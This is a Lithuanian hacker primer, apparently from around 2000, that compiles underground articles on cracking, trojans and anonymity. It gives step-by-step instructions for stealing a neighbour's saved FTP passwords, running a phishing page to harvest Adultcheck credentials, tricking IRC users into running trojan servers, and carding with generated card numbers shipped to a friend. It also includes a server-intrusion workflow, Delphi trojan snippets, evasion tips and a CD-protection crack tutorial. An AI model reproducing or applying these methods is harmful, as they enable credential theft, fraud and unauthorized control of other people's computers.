Hakerio Pradziamokslis

“HAKERIO PRADŽIAMOKSLIS”

Kevino Mitniko idėjos nemirė. Visų šalių Hakeriai vienykites.
Įsivaduokime iš Matricos gniaužtų..

Straipsniai surinkti iš lietuviškų hakerių svetainių. Speciali padėka autoriams

Turinys:

1. Access Aproved
2. Mazhas Adultcheck ID gavimo tutorialas
3. Kaip anonimizuotis ir bandyti likti nepastebetam.
4. Proxy
5. Trojos arkliukai arba kaip jie veikia?
6. Hackingas ir cardingas ZHALIEMS
7. Pasirasyk savo CGI maileri
8. Coll www
9. CRACK
10. UNIX Cracking
11. Delphi
12. Freecell for Windows 98 SE krekinimas
13. Domenas dykai
14. FTP totorial`as
15. FTP Tutorial 2
16. Taksofonai zhaliems
17. Ouestbook hack
18. Hackeriai pries crackerius
19. Internet Hack
20. Keletas irc pamokeliu
21. Kaip nesielgti hakinant
22. Kaip tapti hakeriu
23. Kaip veikia trojanai
24. KREDITINES KORTELES
25. L0phtCrack v2.5 krekinimas
26. Linux tutorialas naujokams
27. Laikinas LINUX tinklas namie
28. HACKERIO MANIFESTAS
29. mIRC bug’s

30. mIRC innvisibility
31. mIRC’o slaptybez
32. NAMEZERO
33. Linux Naujokams
34. UNIX Naujokams
35. Nmap’o panaudojimas hack’o tikslais
36. NMAP (2)
37. Paranoja arba kaip neikliuti
38. Kaip Palikti Inicialus Nulauzhtoje Programoje
39. Trumpai apie PGP
40. Proxy
41. Proxy Adresai
42. REGISTRAS
43. Kur pradedančiajam Hakeriui ieškoti info?
44. Serverio nukepimas
45. Servisai
46. Shell dykai
47. TCP/IP totorial`as
48. Toniniai signalai telefonijoje
49. Technologinio andegraundo atstovu tipologija
50. Trashing
51. Trashingas 2
52. trOJAN REMOVAL
53. Web crack
54. XOR- sifravimo metodas
55. Kaip nucrackin’ti WinZip 7.0

1. Access Aproved

Senais gerais laikais, kada 486 buvo dievu kompas, zhmones kurie naudodavosi tinklo paslaugomis passwordus galvodavo tokius kaip ‘sex’,’fuck’,’peace’ ir t.t. Tada shiuolaikinis hackeris tikrai galejo ramiai tokiais passwordais pasinaudoti. Kartais Tokiu kvileliu paasitaiko ir dabar, kurie vitoj passwordo rasho savo varda, pavarde ar dar ka nors, kas susije su juo. Kartais uzhtenka nueiti i koki http://superhacker.hypermart.net ir pazhiurejus i skiltele “apie mane” galima rasti passworda. Na kaip minejau, tokiu dabar vienetai, bet vi

is del to pasitaiko. Kad to ishvengti mums ishvengtume savo accountuose mums reikia susigalvoti tinkama passworda, kurio hackeris neatspes nei speliodamas, nei paleides brute force. Shtai keletas taisykliu:

1. Niekada negalvok passwordu, tokiu kaip tavo vardas, pavarde ir t.t.
2. Passwordas turi buti sudarytas ish nemazhiau kaip 6-7 simboliu. Ish ju turi buti kaichiai, didzhiosios bei mazhosios raides.
3. Niekada nespausk ant accountu loginu esanchiu skyreliu “Save my password”
4. Niekada neishsaugok passwordu savo PC visokiose passwords.txt (Tam yra galva, jei nera tai tau shakes 🙂
5. Niekada kiekvienam atskiram accountui nekartok to paties passwordo, nes jei suzhinos viena zhinos ir visus kitus.

Tai keletas patarimu. O kaip nulauzhti tuos gudruolius, kurie shiuos patarimus jau senai zhino ir ju laikosi? Na, jie tikrai gudrus, bet mes gudresni :). Tarkim mes priejome prie kaimyno koompo, kuriame yra instaliuotas CuteFTP, o shi programa buvo naudota kaimyno saitui aplaudinti. Ka mes darome? Aishku einame i C:Program filesCuteFTP (gali buti ir kur nors kitur). Pirma suzhinokime esamos programos versija. Tarkim kaimynas turi CuteFTP v2.5. Ten tirkai bus toks failiukas kaip SMDATA.DAT, kuris ir saugo visus naudojamus FTP adresus, username’us bei beabejo passwordus, kurie buna uzhshifruoti nesunkia shifruote. Ta failiuka mes netychia isimetame i savo senai paruoshta floopy, ir su piktdzhiugishka shypsena neshates ji namo. Namie, pasiemes alaus bu

uteli nusikopijuojat parsineshta faila i savo cuteFTP ta pachia versija. Jusu bus paklausta ar norite irashyti atneshta faila ant virshaus, tad spauskite ‘Yes’. Dabar pasileidzhiame savaji CteFTP ir matome , kad atsirado nauju adresu, kuriu tu ankschiau neturejai. Dabar belieka prisijungti prie vieno ish kaimyno accountu ir ka su juo darysi tai jau tavo reikalas. Bet vis del to tai dar ne pabaiga! Tarkim tu nori kaimyna dar labaiu nuliudinti ir pakeisti jo passwordo. Pazhiurejes i accounto propertys matai, kad vietoj passworda yra irashyta kazhkokia fuflo ‘*****’. Ne beda! Tam yra visokios programos. Viena ish ju Snet Boys revelation, kuri turi pointeri, su kuriuo uzhejus ant ***** pasirodo tikras passwordas. Viskas! Tik zhiurek kad negautum nuo kaimyno i galva, uzh visokiu bjaurybiu pripaishyma jo puslpyje ;).

Dar ka norechiau priminti: Ne shtai keletas CuteFTP versiju bei failu, kuruose laikomi ju passwordia:

HOSTS.DAT – CuteFtp V. 1.x
TREE.DAT – CuteFtp V. 2.x
SMDATA.DAT – CuteFtp V. 2.5/2.6

Ir nepamirshk, kad ne tik shi programa turi tokiu failu. Turi ir kitos, tau tereikia juos surasti!

Sekmes!

2. Mazhas Adultcheck ID gavimo tutorialas

Adultchecko ID gavimas yr labai paprastas. 🙂

1.Atsidaryk Hotmailo ar usa.net emailo akaunta (pvz.hotmail@hotmail.com)

2.Naudodamasis nauju emailu atsidryk geocities akaunta

3.Susirask tikra Adultchecko saita ir nusikopijuok jo koda

4.Pakeisk taikini ish adultcheck.cgi (ar kas ten bebutu) i

www.geocities.com/tavo_vartotojo_vardas.cgi – Ka shitai du

uoda?

Ogi ishsiunchia nieko neitarinchios aukos duomenis, ivestus i forma

(pvz. ju adultcheck ID) i geocities cgi bin kuris redirektina juos i

hotmail@hotmail.com.

5.Nukreipk auka i TIKRA adultchecko ID puslapi po to kai jis bus ivedes

info..jiems tai atrodys kaip kox keistas nesusipratimas (dauguma windoze

vartotoju yra priprate prie to ir negalvos apie tai dar karta.. netgi

jei ir pagalvos, tai bus jau velu).

6.Ikishk savo nauja puslapi kur nors,tinka bet kur, netgi tavo geocities

akauntas tix, tik nekishk jo i pirma puslapi – jame geriau tix kox nors

“hi im mike.. I’m 15 and this is my first homepage!! isn’t it kewl!!” ir

prispausdink visokio meshlo geocities kopams.

7.Viliok zhmones i savo saita. ir Valio! dabar tu esi ishdidus autentishku

adultchecko ID ir passwordu savininkas.

Kelios mintys pamastymui.

Visada naudok proxy ar wingata nustatinedamas ar ieidinedamas i savo
akauntus. Juk tu nenori palikti savo realaus IP bet kur, jei del kokios nors
priezhasties jie noretu tave susekti.

Niekad nedek netikro puslapio savo IPT serveryje.tai papraschiausiai kvaila.

Bandydamas ivilioti potencialias aukas i savo saita, NIEKADA nesiusk spamo
i tokius newsgroupus kaip alt.hackers ir t.t. pasilik tai alt.sex ir panashiam
meshlui.

Galiausiai, apdenk savo klaviatura plastiku, apvyniok klavishus, kad pirshtai
neliptu..ir nepaliktu pirshtu atspaudu.

Have Fun

pagal

ThePsyko
Public Enemy #7
“God told me to skin you alive”
http://prozac.iscool.net

medzhiaga paruoshe Winter Wolf.

3. Kaip anonimizuotis ir bandyti likti nepastebetam.

By Craft[Eye] // http://www.underground.lt // CraftEye@gmx.net

Kai ku

urios savokos ir terminai:
Provider – interneto tiekejas(kaip takas)

Proxy – serveris per kuri galima jungtis norint pasiekti puslapi ir t.t.(jis padidina shansus likti nesugautam)

Logas – textinis failas kuriame saugoma visa prisijungimo, siuntimo, gavimo ir panashi informacija.

IP – na paaishkinsiu aishkiau – kiekvienas kompas turi ip sudaryta ish x.x.x.x kur 0 <= x <= 255, pagal shi skaiciu galima suzhinoti daug informacijos apie prisijungimo vieta, provaideri ir t.t..

PGP(Pretty Good Privacy) – vienas ish populiariausiu informacijos kodavimo budu.

Intro

Visu pirma ash esu gaves kelis klausymus kaip “kaip NEANONIMISHKAI nuhakinti sajta?”. Manau tikrai geras klausymas =].Ir ir ji lengva atsakyti. Jei nori nuhakinti saita ir likti pastebetas tau tiesiog reikes atsijungti visus proxy ir t.t. Ir eini prie kokio taikinio ir lauzhi. Bet kas ish to? Ka tai duos. Manau daug esmes hake yra ne tame kad shoostrai defeisisni sajta, o kad liksi nepastebetas. Nors shiais laikas yra labai sunku tai padaryti, visi provaideriai veda logus ir t.t. Na bet pameginti verta ar ne?

Kodel tau reikia saugotis?

Na pirma nuo 2000.01.01 isheis istatymas ir tada jau tu nebegalesi laisvai eiti per visus guestbookus, forumus, web boardus ir deti visu skriptus neuzhsidejas ne proxy. Antra ar tau patinka, kai kas nors skaito tavo laishkus? Manau ne. Shtai kodel anonimishkumas nedrysiu sakyti hakeriui, bet zhmogu kuris jauchia kad zhino shiek tiek daugiau uzh kitu yra labai svarbus dalykas.

Asmenybe

Niekada neishduok savo tikro vardo(na vardas nesvarbu, nors jeigu tavo vardas koks Aldevinas, o toki ash tik viena savo mieste zhinaw tai gali atitinkamai padeti tam tikriems zhmonems), amzhiaus(principo reikalas), pavardes. Manau duoti savo adresa kokiam neaishkiam zhmogui IRC ar dar kur yra ishvis didelis absurdas. Manau visi turetu buti private virtualiame pasaulyje. Heh atsiminkite, kad IRC butu lengva jus surasti, jei rekaujate pilna gerkle kokia tavo pavarde + pazhiureje /dns ar /whois gali pamatyti *!*@vln.dialup.takas.lt ar da ka nors turbut visiems aishku ish kur tu, o dar kai reki kokiam kanale ash Jonas Jonaitis ir t.t. Savo draugam gali pasakyti tik varda, nes esu mates pora atveju IRC kaip ei Jonai Jonaiti varysi i infobalt, taigi draugai irgi gali buti pavojingi buti.

Nickas

Nevartok to pachio nicko hackuose ir IRC. Nes tada jau lengvoka bus tave atsekti, kaip sakant STT =] darbuotojui reikes pasedeti kanale, susidraugauti su tavim ir jau tada. Na aishku jei ruoshiesi daryti, ka nors kokiam draugelio puslapiui tada manau nereikes keisti nicko, bet jei ka nors rimtai, tai tada geriau saugokis. Na jei aishku tavo draugelio tevas ne koks telekomo direktoriaus pavaduotojas.

Nickas ir ne tik IRC

Heh ish praktikos sakau – padefeisina kas sajta ir kisha i forumus hpc puslapiuose DEFACE by ME ir t.t. Manau, kad tai irgi neapgalvotas zhingsnis, nes jei neatseks tuo momentu kai hakinai puslapi ish logu atseks per forumus tavo ip(netgi yra forumuose ivairiuose moderatoriams opcija show ip, o per ju sourcus perejus ar adminam laishka parashius tikrai ip suzhinos, manau nemazhai kas). Jei reksi gerkle visuose forumuose ir wwwboarduose tai ishlysi i pavirshiu ir t.t. Cha kas sake, kad adminai nesilanko HPC puslapuose? =]
Kaip tave gali pagauti?

Ooo simple. Kai kada adminai tiks ispeja, jei nesiliausite imsimes priemoniu ir t.t. Chia geri adminai, blogi adminai kartais uzhsiima tavimi rimtai. Na o kaip jie tave pagauna, chia paprasta kiekvienas provaideris veda logus, jei jungiesi per proxy(apie tai veliau) jie gauna jo IP adresa. Na loguose dazhnai buna narshykles, pashto programos ar pan. versija, LAN kortos numeris, pribumbasiu visokiu – bet svarbiausia ip adresas. Paprasciausia situacija – tu nupyliai puslapi, adminas susinervina, pasizhiuri logus – aha tako ip numeriai, gerai. Pasiima savo mobilu ir surenka koki telekomo telefona > tai padaro 3 val(jei neklystu ne 100% informacija) begyje > tada telekomo dedez pasako telefona ir adresa ant kurio uzhregistruotas telefonas. Kaip jau sakiau geras adminas paskambins ir ispes tave, blogas adminas paprashys telekomo, kad atjungtu tau telefona – shis taip ir padarys, o jei dar skolu uzh telefona turejai – viskas. Ir sedek zhmogus be telefono, kaip akmens amzhiuje. Chia tik pavyzdys. Jei jungsies per proxy, tada adminas parashys draugishka laishka proxy savininkam, jei negaus logo duomenu tada adminas pasakys, kad rimtas reikalas pateiks irodymus ir panashiai, tada proxy davininkas isako adminam duoti duomenis. Tada pamato blogasis adminas, kad per proxy jungtasi ish dial-up, tada jau istorija kartojasi.

4. Proxy

Na papraschiausias budas paslepti savo ip adresatai jungtis per proxy. Visur kur jus lankysites : kaip jau minejau forumuose, wwwboarduose ir t.t. bus rodomas proxy ip. Tai labai smarkiai nepadidins galimybes buti nepagautam, bet shiaip del nekalto browsinimo tai labai naudinga. Kaip konfiguruoti jusu IE,NETSCAPE ar OPERA rekomentuosiu. Tai gana lenga(susirasit patys kaip sakant). Shiaip proxy naudoja du portus 80 ir 8080. Proxy adresas dazhniausiai atrodo taip : proxy.anonimyzer.com ar panashiai. Proxy hakui nera taip pat saugu del jau minetu priezhaschiu. Geriausiai daryti proxy grandine turiu omeni pvz: dial-ip > proxy1.bmw.com > proxy3.audi.com > proxy2.stt.com =] ir paashiai, na bet chia reikes sugebeti padaryti. O tada jau adminam bus sunkiau atsekti tave, jie painiuosis(kuo daugiau proxy tuo geriau). Dar viena nezhymi detale > tik nenaudok skirtingu proxy nuo vieno providerio > kaip proxy.5ci.lt > proxy1.5ci.lt ir t.t. Zhodzhiu proxy bootinas.

E-mail

Apie laishkus trumpai. Jei nenori, kad provideris skaitytu tavo pashto ir pan. Papraschiausiai koduok juos. Yra dabar visokie PGP(Pretty Good Privacy) plachiau www.pgp.com. Gali aishku su draugu sugalvoti savo kalba ir t.t. =]]

Na menka, bet reikshminga detale > nenaudok provaideriu savoje
shalyje. Jie tikrai supras tau rashomu laishku turini. O jau provaideriai uzhsienije, kokioje Japonijoje ar USA/CANADA niekas tikrai nesupras lietuviu kalbos > nereiks nei PGP:). Be to uzhsienio meilai patogesni ir galingesni nei Lietuvos provideriu(musu mylimas puslapiukas www.takas.lt :).

Pabaigai

Zhodzhiu chia aptariau tik kelis budus kaip apsisaugoti ir kaip tave gali pagauti, bei zhinoma svarbiausia, kad nejaustum baimes, kad tavo laishkus skaito koks nors adminas ir juokiasi :). Kaip sakoma atsargiausias – mobiliausias ar kaip ten. Shiaip manau ishpuikimas ir norejimas parodyti save labai PADIDINA shansus, kaip buti sugautam. Ir smarkiai. Ir jei nori parekti koks ash esu ir kad ash sajta “padariau” tai pasiroopink anonimishkumu. Manau ir be to turi galva ir pasiroopinsi anonimishkumu ir nereksi kur papuola “HACKED”. O poto adminas sakys you’re FUCKED. Nu chia lyrinis nukripimas. Zhodzhiu pagalvokite priesh darydami.

Last Message: Anonimas yra niekas, nes jo papraschiausiai nera.

Original text by Craft[Eye] // CraftEye@gmx.net
2000(c) Special for www.underground.lt nu jus supratot ane?

5. Trojos arkliukai arba kaip jie veikia?

Trojos arkliukai (arba kaip jie veikia)
Turbūt daugelis iš jūsų žino kas yra trojanai. Bet ne visi žino kaip jie veikia. Jei hackeris nenutuokia kas yra IP arba portai tegu verčia kitą puslapį. Jei ne, tai kaip sakoma – važiuojam :).

Daugelis iš jūsų turbūt yra žaidę su trojanu(įsivaizduoju vargšo lamerio veidą, kai jam atsidarinėja cd-rom’as ir kaip jis bėga pas kanors pagalbos arba kiša diskelį su 1990 metų Dr.Web :)) Visų pirmą, jie dirba tinklu, dažniausiai TCP/IP protokolu, nes jis popiuliaraiusias juo sukasi Inetas, ir kad kitas žmogus būtų “užsikrėtęs” Trojos arkliuku jam reikia jį gauti ir paleisti. Žmones dažniausiai gauna trojaną e-muilu arba IRC – čia populiariausi būdai (na žinoma tu gali nueiti pas savo draugeli ir pasakyti va čia geras geimas nori? Geras draugas žinoma neatsisako – po tris kartus paleisto “žaidimo” tu jam pasakai, kad turbūt sugedo diskelis! :)) Kai tik paleidi Trojos ponį, jis tuoj perkopijuoja save į C:Windows ir t.t., įsirašo savo paleidėją į kokią nors sisteminę vietelę – rejestrą, kokį nors sisteminį failą(win.ini ir pan.), gudresni išvis gerai daro – susikuria tokį failą su plėtiniu *.VxD(Virtual Extended Driver ar pan.:)) ir nukopijuoja failiuką į c:WindowsSystem, o toliau kai kompas kraunasi Windozai tiesiog “paleidžia” visus *.VxD failiukus. O tada musų draiveris jau paleidžia išsvajotąjį trojaną:). Pusę darbo jau atlikta(jei aišku pas auką nėra ten kokio Norton Doktor Vebas 3000 Milenium Super Profesional Special Edition 😉 – bet ir tai kaikada nepadeda, jei geras trojanas:)). Lieka sužinoti aukos IP – čia jau kaip iš bobutės rankinę atimti(kai kuriais atvėjais). Jei niusiuntei trojaną mIRC’u, tai tiesiog parašai /dns to_kuriam_nusiuntei_trojana_nikas – ir parašo tau jo IP, jei paštu sunkiau – bet kai kurie poniai siunčia IP adresą į pasirinkt’a muilą, jei tu nori pažaist su draugelio kompu – run kortelėje parašai winipcfg(jei WinNt tai – wintipcfg:)). Sužinai jo IP /valio/ paleisk savo kompe vadinamąjį Remote Control’a (tik netą dalį su siurprizas.exe), o tą dalį su kuria valdysi aukos kompą. Ten būna toks laukelis IPHost ar dar kas nors – įrašai skaičiukus arba host vard’a – pvz 0.0.0.0(IP adresą, o ne savo gimimo datą kaip esi pripratęs daryti kai pildai anketą dėl nemokamo cd :)) Spaudi mykoliuką konekt ir jei parašo “succesfuly connected to 0.0.0.0” ar panašiai – tada jau prasideda:).
Jau gali būti BEVEIK įsitikinęs kad žaisi su kažkieno kompu. Kodėl beveik? Todėl, kad serveris ar dar kas nors gali būti password protected(pvz senasis NetBus trojanas sugeba prisijungti prie savo serverio, gali gauti failų sąrašą, bet kai bandai trinti failiuka win.com 🙂 arba atidaryti cd-rom NetAutobusas sako kad serverio kompas apsaugotas nuo redagavimo su password’u ar kokia programa:( ). Bet jei jau sugebėjai prisijungti, 9 atvėjais 10 tu jau naujasis kompo adminas :)). O įvairių trojanų galimybės neregėtos:
1. Valdai kompo failų sistemą.
2. Valdai rejestrą.
3. Kontroliuoji visus įrenginius(gali net atspauzdinti tekstą “hi lama” su aukos printeriu, jei jis įjungtas arba valdomas programiniu būdu t.y. neturi on/off mygtuko :)).
4. Gali peržiūrinėti ekrano vaizdą ir paspausti mygtuką su užrašu X lamos ekrane :).
5. Jei jis dirba kokiame nors WinWord gali jam tiesiai į jo redaguojamą vietą parašyti kokį eilėraštuką.
6. Gauti password’us :).
7. Įrašinėti jo renkamą tekstą klaviaturoje(nebijokite negausi jokių ************* vietoje freexxxvideos :))))).
8. Ir išvis daryti ką nori.
Ir dar daug daug įvairių galimybių. Bent aš asmeniškai rekomenduoju “ten” ikišti kokius 4-3 trojanus ir tada išvis jėga(juk visi Trojos arkliukai skirtingi).
Beje trojanai dažniausiai naudoja WinApi funkcijas(tokias kaip ExitWindowsEx() – jos tinka bet kokiai programavimo kalbai nuo Asemblerio iki VC++ ir Delphi, nes jas realizuoja ne programa, o Windozai, jas tik reikia iškviesti :)). Galiu pademonstruoti kelias jų, jei bandysite patys daryti savo trojaną(pavyzdžiai Delphi sintaks, bet tikram hackeriui juk nesunku išversti iškalbos į kalbą, jei kalba ne kokia VC++ ir ją verti į Asmeblerį:)) kaip duomenys perduosi tinklu- tavo reikalas, o kaip badaryti kelis triukus aš tau parodysiu:
Pavyzdžiui reikia perkelti kursoriu į kitą vietą:
SetCursorPos(x ašies kordinatė,y ašies kordinatė) – apie x,y mokeisi mokykloj, jei ne bandyk įdomesnį variantą :
Randomize;
SetCursorPos(Random(Screen.Width),Random(Screen.Height));
Efektas nuostabus. Perkels kursorių į betkurią ekrano vietą:). Nori perkrauti kompą, išjungti – jokių problemų:
ExitWindowsEx(flagas,0); vietoje žodžio flagas rašyk:
Jei nori perkrauti kompą – EWX_REBOOT, išjungti – EWX_POWEROFF, atsijungti nuo esamo vartotojo – EWX_LOGOFF. Va, visa artilerija :).
Ką dar įdomaus galima padaryti hmm pagalvokime. Sugalvojau – paleisti programą :
WinExec(‘programos pavadinimas’,1); Tos kabutės reikalingos 😉
Beje mano pirmojo trojano pagrindinė funkcija buvo paleisti 1000 notepad’ų. Skamba paprastai, bet vaizdas nepakartojamas:). Jei nori ko nors įdomesnio – prašau, sisteminių klavišų atjungimas:

PROCEDURE TurnSystemKeysOff;
VAR
dummy: INTEGER;
BEGIN
SystemParametersInfo(97, INTEGER(TRUE), @Dummy, 0);
END;

Taip pat galėsi juos ir įjungti:

PROCEDURE TurnSystemKeysOn;
VAR
dummy: INTEGER;
BEGIN
SystemParametersInfo(97, INTEGER(FALSE), @Dummy, 0)
END ;
Na dabar aukai galėsi padaryti tikrai cirką, jis vargšas metysis į šalis – jam ekrane vien notepad’ai, negana to kursorius mėtosi į visas šalis(kaip jis kryžiuką paspaus?:)), jo vienintelė viltis Ctrl + Alt + Del ir taip uždaryti visus notepad’us – bet kas gi čia neveikia nei vienas sisteminis klavišas lieka viena išeitis perkrauti “su protu susipykiusią, kvailą mašiną” , bet jam ir vėl vargti nereikės – kompas staiga pats persikrauna – viskas jis formatuoja hard’a. 🙂 Linksma ar ne? Aš irgi taip manau.
Manai, kad trojanai labai piktas dalykas – iš dalies taip. Kai supranti kaip jie veikia jį lengviau pašalinti, bei supranti jo keliamą pavoju tavo kompiuteriui! Beje Trojos poniai gali ir pasitarnauti – yra žmonių kurie adminisruoja nutolusius kompus su trojanais.
Ir dar – jei patys nenorit, tingit rašyti savo trojanų parsisiūskit kokius 5 ir susiraskit aukų. Trojanų pilna internete. Aš rekomenduočiau SubSeven gold ar dar kokį iš tos serijos(mano mylimiausias), taip pat DeepThroat 3,1 ar naujesnę versiją vertėtų parsisiųsti. Na kaip nepaminėsi senbuvių – BO2k(Back Oriface 2000) ir NetBus Pro. Dar yra įvairių įvairiausių. Manau pilniausią jų sarašą galit peržiūrėti galite Web puslapyje http://www.tlsecurity.net/amt.htm ten yra pilnas daugelio trojanų aprašymas ir būdai kaip jį panaikinti :).
Na ką draugai hackeriai aš su jumis. Jei ką rašykit! Tikiuosi straipsnis patiko! Jei ne, ką padarysi ne visiem įtiksi, jei ką rašykit man į muilą.IKI Gero Hack’o!
Craft[Eye] – CraftEye@gmx.lt

6. Hackingas ir cardingas ZHALIEMS

Sitam texte pateikiami *TIK* pagrindai . Tai visai nereishkia, kad jie gali buti visur
sekmingai panaudoti . Ash(autorius) neatsakau uzh jokia zhala, kuria JUS pridarysite
naudodami shia medzhiaga . Ash neskatinu nei isilauzhimu nei cardingo ir nereishkia
kad ash tuo uzhsijimu jei rashau toki texta .

1.Hakingas

1.1.Serveriu hakingas

Serveriu hakingas susideda ish keliu etapu :

1.Portu skanavimas
Siunciami paketai i tam tikra serveri ir ieshkoma atidaru portu . Skaneriai gali buti
padaryti per cgi (RI7S toolzai) ar veikti tiesiai jusu kompe . Yra skaneriu beveik visoms
sistemoms . Vienas gereusiu ant UNIX tipo sistemu(linux,minix,AIX,SunOS)
veikianciu skaneriu yra nmap (www.insecure.org) . Yra skaneriu ir ant win9x bei winNT bet
jie yra labai ribotu galimybiu, bet savo funkcija atlieka .
2.Servisu aptikimas pagal portus
Tam yra servisu pagal portus sarashai bet ir be ju daug kam zhinoma, kad pvz WWW servai
eina ant 80 porto .
3.Servisu serveriu versiju nustatymas
Reikia telnetintis i tam tikra porta . Jei nemokat(?), tai i FTP(21 portas) galit prisiko-
nektint naudodami paprashciausia FTP client’a ir jum dazniausiai parashys versija .
4.Exploitu tom versijom ieshkojimas
Nu susirandat ir uzhrashot visu servisu versijas ir puolat ieshkot exploitu inete .
Nu galit eiti i astalavista.box.sk(ar www.av.com) ir rasykit “exploits” gal surasit saita
kuri pamegsit . O gal jau toki turit . Nu sheip keli exploitai yra mano megstamam
lietuvishkam saite ri7s.cjb.net . Bet ten yra tikrai ne visi exploitai .
5.Exploitinimas
Tada imat ir konkektinates prie savo linux shell’o ir kompiliuojat exploita .
Yra ir komplieriu ant windows bet ash tuo nesidomejau . Jei neturit shell’o nueikit
(Klaipedoj) i KU ir jums tikrai duos . Jei gyvenat kitam mieste tai galit prashyt kietesniu
pazhystamu . Zhodzhiu cia jusu reikalas kaip susikompailint .
6.Backdoorinimas
Instaliuojat koki rootkita priesh tai pasidomeje juo(RTFM) . Galit koki norit
kita trojana ajshku . Nu pasiieshkokit .

Nu jau ir turit access ant serverio . Gal eggdrop’u statyt nepulkit, bet . =]

1.2.Windoze peremimas ( Ce apie access ant windoze kurio owneris yra 101% lamah .
Kitaip neveix :[ )

Tai wo . Imat kokia progshe . Nu trojana . Surandat SERVER dali bet jos nepaleidzhiat,
o ikishat kokiam lamah . Placiau : Susitinkat per IrC ir sakot : “ei xebrantas !
Ar tik nenori hakeriu but ??? Imk zhek cia galesi isilausht i kompus su tokia programa ! “
=] Lamah paima jusu SERVER’i . Executina . Jus executinat CLIENT trojano dali ir konek-
tinaties prie lamoz . Tada siulyciau i sisteminius failus ivaryti koki kita trojana .
Nu cia reikalinga todel, kad jei pirma trojana suras . Nu yra tokios programeles kuriu anti-
virus negaudo . Jos nevadinamos TROJANAIS o gali buti panaudotos tam . Oficialiai ir trojanai
vadinasi REMOtE ADMINISTRATION toolz . Taigi ieshkokit komerciniu toolz’u crack’inkit .

Keli patarimai : neikit savo niku, naudokit proxy ir raukites tik ant 24/7/365 access’a prie
ineto turinciu kompu .

2.Cardingas (*DEMESIO* sita draudzhia lietuvos istatymai)

1.Imat netscape ir instaliuojat
2.Paleidziat
3.Susirandat WWW proxy kruva .
4.Sukonfiginat kad veiktu per proxy grandine (proxy.ktu.lt:8080//proxy.com:81//proxy.jp ir
paskutinio serverio porta porto vietoj) . Uzh tai ash dekingas vienam xebrantui kurio zhinute
pastebejau RI7S BB .
5.Imat CC# generatoriu ir darot CC# .
6.Konektinates prie saito kuriam zhadat pirkt .
7.Susitariat su draugeliu, kad nesakys niekam, kad pas ji atejo kokia preke .
8.Rashot savo varda ir pavarde, CC#, draugelio adresa tikra .
9.Zhiurit kad prekiu verte nevirshytu 700Lt nes nereikia muito moket iki ~tiek .
10.Laukiat prekiu ir niekam nesake pasiimat is draugo dezhutes cheki nueinat i pashta
ir pasiimat preke .
11.Jei kas, draugas sako kad nieko nebuvo ir kad jis taves nepazhysta .

Taigi kolkas viskas, bet kaip zhaliems turetu uzhtekt tokio gaido .

Written in 2000/07 by jogis

7. Pasirasyk savo CGI maileri

Manau daugelis noretu moketi padaryti cgi pasto programa,
ar ka nors panasaus, kas dirba su socketais.
Zemiau pateikiu su komentarais gabaleli skripto,
kuris siuncia email`a.

############## Duomenys gauti is formos ###########
$from=$FORM{‘from’};
$to=$FORM{‘to’};
$subj=$FORM{‘subj’};
$msg=$FORM{‘msg’};
###################################################

($x,$x,$x,$x, $here) = gethostbyname($null);
($x,$x,$x,$x, $there) = gethostbyname($smtp_server);
$thisserver = pack(‘S n a4 x8’,2,0,$here);

########### Priespaskutinis kintamasis- konstanta yra portas (25)
$remoteserver = pack(‘S n a4 x8’,2,25,$there);

############## Kuriam soketa #######################
(!(socket(S,2,1,6))) && (&error(“SMTP EMAIL: Connect error! socket”));
############## subindinam ##########################
(!(bind(S,$thisserver))) && (&error(“SMTP EMAIL: Connect error! bind”));
############## konektinames su serveriu ############
(!(connect(S,$remoteserver))) && (&error(“SMTP EMAIL: connection to $smtp_server has failed!”));

################# parenkam/ sukeiciams deskriptorius
select(S);
$| = 1;
select(STDOUT);

################ skaitom soketo (serverio) ir tikrinam ar nera klaidu
$DATA_IN = ;
($DATA_IN !~ /^220/) && (&error(“SMTP EMAIL: data in Connect error – 220”));

################### toliau viskas vyksta #################
################### paprasciausiai perdavinejan #################
################### smtp servui komandas #################
print S “HELO tavo_hostasrn”;
$DATA_IN = ;
($DATA_IN !~ /^250/) && (&error(“SMTP EMAIL: data in Connect error – 250”));

print S “MAIL FROM: $fromn”;
$DATA_IN = ;
($DATA_IN !~ /^250/) && (&error(“SMTP EMAIL: $emailfrom address not valid”));

print S “RCPT TO: $ton”;
$DATA_IN = ;
($DATA_IN !~ /^250/) && (&error(“SMTP EMAIL: $recipient address not valid”));

print S “DATAn”;
$DATA_IN = ;
($DATA_IN !~ /^354/) && (&error(“SMTP EMAIL: Message send failed – 354”));

print S <;
($DATA_IN !~ /^250/) && (&error(“SMTP EMAIL: Message send failed – try again – 250”));

print S “QUITn”;

8. Coll www

Pasidaryk šustrą puslapi Pasidarei shustra puslapi? Apie ka jis? Nuogas merginas, mashinas, kompiuterius, ju lauzhyma. Na nesvarbu. Svarbu, kad tavo www yra geras ir todel tau reikes ji patalpinti geoj vietoj ( kalbu ne apie kuno daly :). Internetas dabar prikimshtas visokiu redirektu, vietu puslapiams bei kitu patogiu dalykeliu. Shiame straipsnyje ash papasakosiu kaip atsikratyti daugelio nervinanchiu baneriu, kur patalpinti savo puslapi, kur gauti gera redirekta ir net kaip uzh veltuj gauti DOMANA! Pradekime nuo patalpinimo. Shtai tarkim hypermart.net. Duoda tau adresa “vardas.hypermart.net”. Galesi siusti 20 megu, bet kiekvienam tavo puslapyje metys labai nervinanti baneri, kurio labai paprasta atsikratyti.

9. CRACK

Sitame tutoriale, as jums parodysiu kaip nulauzti, CD apsauga, naudojant Win32Dasm ir Hiew.

Na ka, pradedam:
Visu pirma, jus privalote paleisti ta zaidima, kuri jus norite nulauzti, be CD. Na aisku zaidimas nepasileis, (Prasau tik nepanikuokite:), viskas, ka jus pamatysite tai, isokanti lanaga kuris pranesa “gera naujiena”. Na ka si zinute tai tikrai gera naujiena, nes ji mums ir pades patvarkyti ta nelemta zaidima, taigi viskas ka jus siuo metu turite atsiminti, tai ta zinute, kuri jums pranese, kad reikalingas CD. Pavyzdziui: Please insert the – CD, arba: You need the CD to play the *** .( ***, yra zaidimo pavadinimas, kuri jus norite nucrackinti). Beje jei jus esate su ribotu atminties kiekiu savo galvoje, ir nesugebate atsiminti sios zinutes kuri praso CD, tai uzsirasykite ja, ant kokio nors popiergalio. Taigi dabar pasileiskite Win32Dasm, ir atsiradusiame lange paspauskite DISASSEMBLE, po to isokusiame meniu, pasirinkite OPEN FILE TO DISSASSEMBLE. Atsiras kitas langas, kuriame jus turesite susirasti to zaidimo exe faila, kuri norite nucrackinti. Kai tai atliksite, prades begti tokia eilute, taigi tai ustruks kelias minutes, taigi siulau pramankstinti savo kojeles ir patraukti kur karaliai pesti vaiksto:).

